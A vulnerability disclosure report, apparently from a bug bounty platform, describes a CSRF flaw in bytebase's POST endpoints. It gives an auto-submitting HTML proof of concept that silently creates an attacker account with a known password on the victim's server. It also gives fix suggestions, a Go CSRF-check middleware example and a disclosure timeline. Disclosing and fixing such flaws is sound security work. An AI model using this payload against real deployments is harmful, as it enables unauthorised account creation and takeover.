Cross-Site Request Forgery (CSRF) in bytebase/bytebase

Valid

Reported on Oct 13th 2021


Description

All parts of the application that use the POST HTTP method to change or create data are vulnerable to CSRF attacks (for example, the PATCH endpoints are not vulnerable).

I will show just a "create a member" PoC for you; if you want to see PoCs for the other endpoints, just tell me and I will provide them too (I thought more PoCs were not needed).

1. Open the PoC.html file.

2. After you open PoC.html, a request will be sent to the http://YOURSERVER:5678/api/principal endpoint.

3. After that you can see that the attacker has created a Dev member named attacker with the email attacker@mail.com, and the attacker already has the credentials of the new user.

PoC.html:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURSERVER:5678/api/principal" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;data&quot;&#58;&#123;&quot;type&quot;&#58;&quot;PrincipalCreate&quot;&#44;&quot;attributes&quot;&#58;&#123;&quot;name&quot;&#58;&quot;attacker&quot;&#44;&quot;email&quot;&#58;&quot;attacker&#64;mail&#46;com&quot;&#44;&quot;password&quot;&#58;&quot;VGS86VrDTMAOUYP0&quot;&#125;&#125;&#44;&#13;&#10;&quot;test&quot;&#58;&quot;" value="&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

The impact of this CSRF is high.

# Fix suggestion

Set the SameSite flag for all cookies to Strict or Lax.

Or, better, create a CSRF token for each request.
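As an added example (not code from the bytebase project), the Go snippet below shows the server side of both suggestions: the session cookie is issued with SameSite=Lax, and each state-changing request must carry a double-submit CSRF token; it also requires Content-Type: application/json, which a cross-site HTML form like the PoC above cannot send. The origin, cookie name and header name are assumptions for the example.

```go
package main

import (
	"crypto/subtle"
	"errors"
	"net/http"
	"strings"
)

// Placeholders for this example: the deployment origin and the CSRF cookie name are assumptions.
const (
	trustedOrigin  = "http://YOURSERVER:5678"
	csrfCookieName = "csrf_token"
)

var errCSRF = errors.New("request rejected by CSRF check")

// newSessionCookie builds the session cookie with SameSite=Lax (the first fix suggested above);
// browsers then omit it from a cross-site top-level POST such as the PoC form.
func newSessionCookie(name, value string, secure bool) *http.Cookie {
	return &http.Cookie{Name: name, Value: value, Path: "/", HttpOnly: true,
		Secure: secure, SameSite: http.SameSiteLaxMode}
}

// checkCSRF applies three layers to a state-changing request: the JSON API only accepts
// Content-Type: application/json (a plain <form> can only send text/plain, urlencoded or
// multipart, so the PoC body fails here); an Origin header, if present, must be our own
// origin (Origin carries no path, so a string compare is enough); and the X-CSRF-Token
// header must equal the csrf cookie value (double-submit token).
func checkCSRF(r *http.Request) error {
	switch r.Method {
	case http.MethodGet, http.MethodHead, http.MethodOptions:
		return nil // safe methods change no state
	}
	ct := strings.TrimSpace(strings.Split(r.Header.Get("Content-Type"), ";")[0])
	if !strings.EqualFold(ct, "application/json") {
		return errCSRF
	}
	if origin := r.Header.Get("Origin"); origin != "" && origin != trustedOrigin {
		return errCSRF
	}
	c, err := r.Cookie(csrfCookieName)
	if err != nil || c.Value == "" {
		return errCSRF
	}
	if subtle.ConstantTimeCompare([]byte(r.Header.Get("X-CSRF-Token")), []byte(c.Value)) != 1 {
		return errCSRF
	}
	return nil
}
```

Wire checkCSRF into the handler chain in front of every POST route (such as /api/principal) so that a request failing it is answered with 403 before any data is created.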

We have contacted a member of the bytebase team and are waiting to hear back 2 months ago
bytebase/bytebase maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
bytebase/bytebase maintainer confirmed that a fix has been merged on fd1d92 2 months ago
The fix bounty has been dropped
amammad
2 months ago

Researcher


Hey bytebase team, can I ask you to tell me why you deleted the other occurrences?

amammad
2 months ago

Researcher


There are many CSRFs in bytebase and I found all of them. If you make one fix for all, that doesn't mean there is only one occurrence (according to other bug bounty programs that I have seen). Please let me know, and if you agree I will report them again.

amammad
a month ago

Researcher


Hey ByteBase team

Any feedback?